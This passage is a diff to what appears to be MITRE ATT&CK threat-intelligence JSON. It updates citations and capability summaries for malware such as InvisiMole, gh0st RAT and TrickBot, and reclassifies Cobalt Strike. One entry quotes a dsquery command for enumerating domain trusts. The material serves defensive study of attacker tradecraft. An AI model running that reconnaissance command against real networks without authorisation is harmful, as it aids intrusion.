"type": "relationship", - "modified": "2020-03-20T00:08:41.258Z", + "modified": "2020-08-13T20:12:50.925Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -103778,15 +108949,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "type": "relationship", - "modified": "2020-03-17T02:22:39.590Z", + "modified": "2020-09-02T18:46:33.342Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -103881,22 +109053,27 @@ { "id": "relationship--b7760f6b-9b57-4fa8-895a-4f4a209aa366", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can upload files to the victim's machine for operations.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2020-03-17T00:09:26.391Z", + "modified": "2020-07-16T15:07:27.488Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -103913,7 +109090,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "type": "relationship", @@ -104128,15 +109305,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", "type": "relationship", - "modified": "2020-03-17T02:22:39.597Z", + "modified": "2020-09-02T18:46:33.376Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -105655,22 +110833,27 @@ { "id": "relationship--9fde631f-9e22-40fe-b6bb-071bd689c8f9", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can record sound using input audio devices.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "type": "relationship", - "modified": "2020-03-17T00:09:26.395Z", + "modified": "2020-07-16T15:07:27.491Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -107870,7 +113053,7 @@ { "id": "relationship--af883d09-3f26-4267-9081-4783447e3283", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -107879,13 +113062,18 @@ "source_name": "FireEye Hacking Team", "description": "FireEye Threat Intelligence. (2015, July 13). Demonstrating Hustle, Chinese APT Groups Quickly Use Zero-Day Vulnerability (CVE-2015-5119) Following Hacking Team Leak. Retrieved January 25, 2016.", "url": "https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "type": "relationship", - "modified": "2019-04-16T20:26:40.949Z", + "modified": "2020-07-15T19:28:00.918Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -108509,7 +113697,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "type": "relationship", - "modified": "2020-03-12T19:03:12.166Z", + "modified": "2020-10-08T17:36:01.967Z", "created": "2017-05-31T21:33:27.024Z" }, { @@ -108816,7 +114004,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "type": "relationship", @@ -110319,7 +115507,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", "type": "relationship", @@ -110994,22 +116182,27 @@ { "id": "relationship--e0292b89-50c2-4b62-8471-6a1b27dc7fc3", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim\u2019s machine.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) gathers the local system time from the victim\u2019s machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "type": "relationship", - "modified": "2020-03-17T00:09:26.238Z", + "modified": "2020-07-20T13:25:54.929Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -111390,22 +116583,27 @@ { "id": "relationship--9256370f-60b2-4ab5-9a23-28c8cde73026", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can launch a remote shell to execute commands.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "type": "relationship", - "modified": "2020-03-20T02:20:16.256Z", + "modified": "2020-07-17T17:34:21.783Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -111510,7 +116708,7 @@ ], "source_ref": "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", @@ -112109,15 +117307,20 @@ "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.", "url": "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "source_name": "Nccgroup Gh0st April 2018" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)", "id": "relationship--a9a71970-33d1-4336-acb3-9252b91d27a4", "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "type": "relationship", - "modified": "2019-04-16T20:26:40.960Z", + "modified": "2020-07-15T19:28:00.923Z", "created": "2019-01-29T14:51:06.742Z" }, { @@ -112597,7 +117800,7 @@ "id": "relationship--2ad95088-71af-462d-a18d-51c35a0cc6b3", "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "type": "relationship", "modified": "2019-07-25T14:25:53.638Z", "created": "2019-01-30T14:19:17.921Z" @@ -113092,7 +118295,7 @@ "source_name": "CobaltStrike Scripted Web Delivery" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "type": "relationship", @@ -113505,7 +118708,7 @@ { "id": "relationship--e0ce4a5f-ac3b-4d61-b540-c5c3c434beb0", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) injects into the svchost.exe process.(Citation: S2 Grupo TrickBot June 2017)(Citation: Trend Micro Totbrick Oct 2016)(Citation: Microsoft Totbrick Oct 2017)(Citation: Cyberreason Anchor December 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -113524,13 +118727,18 @@ "source_name": "Microsoft Totbrick Oct 2017", "description": "Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.", "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], "source_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "relationship_type": "uses", "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "type": "relationship", - "modified": "2020-03-16T19:14:31.386Z", + "modified": "2020-09-11T13:27:44.732Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -113793,22 +119001,27 @@ { "id": "relationship--59193fff-6bea-41c6-b744-36850e6cc39a", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) determines a working directory where it stores all the gathered data about the compromised machine.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", "type": "relationship", - "modified": "2020-03-17T00:09:26.250Z", + "modified": "2020-07-16T15:24:33.132Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -113888,7 +119101,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "type": "relationship", @@ -114963,15 +120176,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2020-03-17T02:22:39.568Z", + "modified": "2020-09-02T18:46:33.425Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -115258,15 +120472,16 @@ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" }, { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "malware--9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "relationship_type": "uses", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "type": "relationship", - "modified": "2020-03-17T02:22:39.554Z", + "modified": "2020-09-02T18:46:33.468Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -115816,15 +121031,20 @@ "description": "Pantazopoulos, N. (2018, April 17). Decoding network data from a Gh0st RAT variant. Retrieved November 2, 2018.", "url": "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "source_name": "Nccgroup Gh0st April 2018" + }, + { + "source_name": "Gh0stRAT ATT March 2019", + "url": "https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant", + "description": "Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020." } ], - "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) adds a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)", + "description": "[gh0st RAT](https://attack.mitre.org/software/S0032) has added a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)", "id": "relationship--ab2b2cd2-9f20-4497-a6d3-ef1698809779", "source_ref": "malware--88c621a7-aef9-4ae0-94e3-1fc87123eb24", "relationship_type": "uses", "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "type": "relationship", - "modified": "2019-04-16T20:26:40.969Z", + "modified": "2020-10-16T00:45:59.541Z", "created": "2019-01-29T14:51:06.807Z" }, { @@ -116160,7 +121380,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "type": "relationship", @@ -116332,7 +121552,7 @@ ], "source_ref": "intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", @@ -118761,7 +123981,7 @@ { "id": "relationship--4eec017c-8bf2-4eda-8c92-15926fc7e5aa", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also collects disk space information and sends it to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)", + "description": "Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also collects disk space information and sends it to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret).", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -118772,9 +123992,9 @@ "source_name": "Novetta Blockbuster" }, { - "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", - "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + "source_name": "Novetta Blockbuster Destructive Malware" }, { "source_name": "Novetta Blockbuster Loaders", @@ -118782,9 +124002,9 @@ "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf" }, { - "source_name": "McAfee Lazarus Resurfaces Feb 2018", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/" + "source_name": "McAfee Lazarus Resurfaces Feb 2018" }, { "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", @@ -118796,7 +124016,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", "type": "relationship", - "modified": "2019-12-20T14:28:39.095Z", + "modified": "2020-09-22T16:38:56.741Z", "created": "2017-05-31T21:33:27.066Z" }, { @@ -118834,7 +124054,7 @@ "source_name": "Cobalt Strike DCOM Jan 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "type": "relationship", @@ -119681,7 +124901,7 @@ { "id": "relationship--0bd9fd2b-e2f7-48f1-8988-31c041691585", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -119690,13 +124910,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." } ], "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "relationship_type": "uses", "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "type": "relationship", - "modified": "2020-03-17T15:08:58.246Z", + "modified": "2020-08-13T14:05:45.410Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -120216,7 +125441,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "type": "relationship", @@ -122551,16 +127776,21 @@ "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "external_references": [ { - "source_name": "Fortinet TrickBot", + "description": "Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot\u2019s New Reconnaissance Plugin. Retrieved February 14, 2019.", "url": "https://www.fortinet.com/blog/threat-research/trickbot-s-new-reconnaissance-plugin.html", - "description": "Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot\u2019s New Reconnaissance Plugin. Retrieved February 14, 2019." + "source_name": "Fortinet TrickBot" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], - "description": "[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can gather information about domain trusts by utilizing [Nltest](https://attack.mitre.org/software/S0359).(Citation: Fortinet TrickBot)(Citation: Cyberreason Anchor December 2019)", "relationship_type": "uses", "id": "relationship--f4d15148-3a41-4fbc-a42e-59379724acc5", "type": "relationship", - "modified": "2019-06-24T19:15:06.908Z", + "modified": "2020-09-11T13:27:44.784Z", "created": "2019-02-14T17:45:24.855Z" }, { @@ -122572,16 +127802,16 @@ "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0", "external_references": [ { - "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.", - "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", - "source_name": "Harmj0y Domain Trusts" + "source_name": "Harmj0y Domain Trusts", + "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019." } ], "description": "[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with dsquery * -filter \"(objectClass=trustedDomain)\" -attr *.(Citation: Harmj0y Domain Trusts)", "relationship_type": "uses", "id": "relationship--da7ddc38-f706-43b4-b3e7-fa3e5d1d2cff", "type": "relationship", - "modified": "2019-04-25T00:08:30.198Z", + "modified": "2020-09-17T18:26:17.799Z", "created": "2019-02-14T17:49:30.824Z" }, { @@ -123274,7 +128504,7 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80", - "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "external_references": [ { "source_name": "FireEye APT39 Jan 2019", @@ -123286,7 +128516,7 @@ "relationship_type": "uses", "id": "relationship--a1c62ce5-2f11-415f-bca1-c9021530c090", "type": "relationship", - "modified": "2019-04-29T18:16:38.494Z", + "modified": "2020-08-11T15:46:27.085Z", "created": "2019-02-21T21:17:37.986Z" }, { @@ -123329,11 +128559,11 @@ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020." } ], - "description": "[APT39](https://attack.mitre.org/groups/G0087) has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)", + "description": "[APT39](https://attack.mitre.org/groups/G0087) has used [CrackMapExec](https://attack.mitre.org/software/S0488) and a custom port scanner known as BLUETORCH for network scanning. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)", "relationship_type": "uses", "id": 